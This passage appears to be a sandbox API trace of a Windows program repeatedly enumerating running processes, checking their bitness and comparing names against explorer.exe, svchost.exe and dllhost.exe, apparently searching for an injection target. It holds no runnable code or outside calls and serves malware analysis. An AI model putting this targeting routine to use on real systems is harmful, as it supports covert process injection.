hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.715] CloseHandle (hObject=0xec) returned 1 [0196.716] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0196.716] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0196.716] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0196.716] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0196.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0196.716] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.716] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.716] CloseHandle (hObject=0xec) returned 1 [0196.716] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0196.716] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0196.716] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0196.716] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0196.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0196.717] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.717] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.717] CloseHandle (hObject=0xec) returned 1 [0196.717] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0196.717] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0196.717] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0196.717] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0196.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0196.718] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.718] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.718] CloseHandle (hObject=0xec) returned 1 [0196.718] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0196.718] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0196.718] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0196.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0196.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0196.718] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.718] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.718] CloseHandle (hObject=0xec) returned 1 [0196.718] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0196.718] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0196.718] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0196.718] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0196.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0196.719] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.719] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.719] CloseHandle (hObject=0xec) returned 1 [0196.719] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0196.719] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0196.719] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0196.719] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0196.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0196.720] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.720] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.720] CloseHandle (hObject=0xec) returned 1 [0196.720] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0196.720] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0196.720] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0196.720] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0196.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0196.720] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.720] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.720] CloseHandle (hObject=0xec) returned 1 [0196.720] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0196.720] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0196.720] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0196.720] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0196.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0196.721] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.721] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.721] CloseHandle (hObject=0xec) returned 1 [0196.721] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0196.721] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0196.721] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0196.721] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0196.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0196.722] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.722] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.722] CloseHandle (hObject=0xec) returned 1 [0196.722] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0196.722] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0196.722] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0196.722] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0196.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0196.722] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.722] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.722] CloseHandle (hObject=0xec) returned 1 [0196.723] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0196.723] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0196.723] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0196.723] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0196.723] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0196.724] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0196.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0196.724] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0196.725] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0196.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0196.725] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0196.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0196.726] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0196.726] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.726] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.726] CloseHandle (hObject=0xec) returned 1 [0196.726] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0196.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0196.727] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.727] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.727] CloseHandle (hObject=0xec) returned 1 [0196.727] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0196.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0196.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.772] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0196.772] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.772] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.772] CloseHandle (hObject=0xec) returned 1 [0196.772] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0196.772] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.773] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0196.773] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.773] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.773] CloseHandle (hObject=0xec) returned 1 [0196.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.773] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0196.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0196.774] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.774] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.774] CloseHandle (hObject=0xec) returned 1 [0196.774] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0196.774] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0196.774] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.774] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0196.774] CloseHandle (hObject=0xec) returned 1 [0196.774] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0196.775] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0196.775] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0196.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0196.775] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0196.775] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0196.776] CloseHandle (hObject=0xe8) returned 1 [0196.776] Sleep (dwMilliseconds=0x3e8) [0197.817] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0197.819] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0197.819] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0197.819] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0197.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0197.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0197.820] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0197.820] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0197.821] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0197.821] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0197.821] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0197.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0197.822] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0197.822] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0197.822] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0197.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0197.823] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0197.823] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0197.823] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0197.824] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0197.824] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0197.825] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0197.825] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.825] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0197.826] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0197.826] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.826] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0197.827] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0197.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0197.827] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.827] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0197.828] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0197.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0197.828] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0197.828] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0197.829] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.829] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.829] CloseHandle (hObject=0xec) returned 1 [0197.829] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 